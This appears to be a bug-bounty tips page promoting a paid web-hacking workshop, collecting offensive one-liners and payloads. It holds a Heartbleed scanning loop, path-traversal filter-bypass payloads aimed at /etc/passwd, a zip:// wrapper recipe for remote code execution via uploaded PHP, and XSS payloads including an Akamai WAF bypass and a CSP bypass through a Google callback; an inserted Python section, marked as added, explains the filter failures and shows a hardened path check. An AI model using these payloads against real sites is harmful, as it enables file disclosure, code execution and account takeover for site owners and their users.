Bug bounty Tips
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Do share, and I would be happy if everyone would like to join this free workshop on mastering web hacking, with hands-on practice on two vulnerabilities.
Unlock the door to limitless knowledge and skill! 🚀 Join our exclusive workshop and ignite your passion for learning. Subscribe now for an adventure in growth and innovation that awaits! 🌟 #Workshop #LearnWithUs #SubscribeNow https://cipherops.gumroad.com/l/MasteringBugBounty
Here is how you can extract a zip file remotely:
pip install remotezip
# list contents of a remote zip file
remotezip -l "http://site/bigfile.zip"
# extract file.txt from a remote zip file
remotezip "http://site/bigfile.zip" "file.txt"
Here’s a handy command to extract URLs from junk / assorted data:
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"
curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"
By: @imranparray101
Heartbleed vulnerability one-liner:
cat list.txt | while read -r line; do echo "QUIT" | openssl s_client -connect "$line:443" -tlsextdebug 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo "$line: safe"; done
Broad scope – Apple, RedHat, IBM, OpenBSD, Microsoft, Oracle ..
Antivirus products – Avira, Avast!, ESET, TrendMicro, Symantec ..
Security appliances – AlienVault, PaloAlto Networks, FireEye ..
Network equipment – Cisco, F5 Networks, Linksys ..
Chip manufacturers – Arduino, Intel ..
VoIP telephony – Asterisk ..
Scripting languages – Perl, Python ..
Databases – MongoDB, Firebase, Oracle ..
Mobile devices – Android, Qualcomm, Nokia, HTC ..
Telecommunications – AT&T, Verizon, Vodafone ..
1. How to find Origin IP
2. NucleiFuzzer = Nuclei + Paramspider
3. CRLF injection allow => cookie injection in root domain & xss
4. How to Find XSS in Wide Scope
5. Remote Code Execution | A Story of Simple RCE on Jenkins Instance.
6. Defeat the HttpOnly flag to achieve Account Takeover | RXSS
7. Discovering Login Panels and Detecting SQL Injection with Logsensor
8. Automating web pentesting with jaeles scanner
9. Afrog scanner for bug bounty hunters
10. RCE via Dependency Confusion
11. How to Get Unique Subdomains on Large scope
12. Expose domains over Akamai or Cloudflare with HEDnsExtractor and httpx
#bugbountytips
A list of filter bypass payloads for hunting LFI vulnerabilities:
→index.php?page=....//....//etc/passwd
→index.php?page=..///////..////..//////etc/passwd
→index.php?page=/var/www/../../etc/passwd
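Why path filters like these fail, and the check that holds, as an added example that is not part of the original post. The post does not say which filters its payloads defeat, so the three weak filters and the web root /var/www (taken from the third payload's prefix) are assumptions for illustration.

```python
import posixpath

BASE = "/var/www"  # assumed web root, taken from the third payload's prefix

# The three payloads quoted in the post above.
PAYLOADS = [
    "....//....//etc/passwd",
    "..///////..////..//////etc/passwd",
    "/var/www/../../etc/passwd",
]

def strip_once(page):
    """Assumed weak filter 1: delete '../' in a single pass, then append to BASE."""
    return posixpath.normpath(BASE + "/" + page.replace("../", ""))

def block_literal(page):
    """Assumed weak filter 2: reject only the literal substring '../../'."""
    if "../../" in page:
        return None
    return posixpath.normpath(BASE + "/" + page)

def prefix_only(page):
    """Assumed weak filter 3: accept any value that starts with BASE."""
    if not page.startswith(BASE + "/"):
        return None
    return posixpath.normpath(page)

def contained(page):
    """Hardened check: canonicalise first, then test containment.
    On a real filesystem use os.path.realpath so symlinks are resolved too."""
    resolved = posixpath.normpath(posixpath.join(BASE, page))
    if resolved == BASE or resolved.startswith(BASE + "/"):
        return resolved
    return None  # resolved path leaves BASE: refuse the request

def escapes(path):
    """True when a filter returned a path that lies outside BASE."""
    return path is not None and path != BASE and not path.startswith(BASE + "/")

def report():
    """Pair each weak filter with the payload that defeats it."""
    weak = (strip_once, block_literal, prefix_only)
    return [(f.__name__, escapes(f(p)), contained(p)) for f, p in zip(weak, PAYLOADS)]

if __name__ == "__main__":
    for name, bypassed, hardened in report():
        print(f"{name:14} bypassed={bypassed} hardened={hardened}")
```

The first payload is harmless once nothing strips it: "...." is an ordinary directory name, so the hardened check keeps it inside the base, where the file does not exist.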
Bug Bounty Hunting Tip :-
If you can upload .zip file on target then:
1. Create a .php file (rce.php)
2. Compress it to a .zip file (file.zip)
3. Upload your .zip file on the vulnerable web application.
4. Trigger your RCE via:
( https://<target Site>.com/index.php?page=zip://path/file.zip#rce.php )
A nice way to store the payload
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
A payload to bypass Akamai WAF
<A href="javascrip%09t:eval.apply
${[jj.className+(23)]}" id=jj class=alert>Click Here
CSP Protection Bypass (using Google domain)
/o/oauth2/revoke?callback=alert(1);console.log
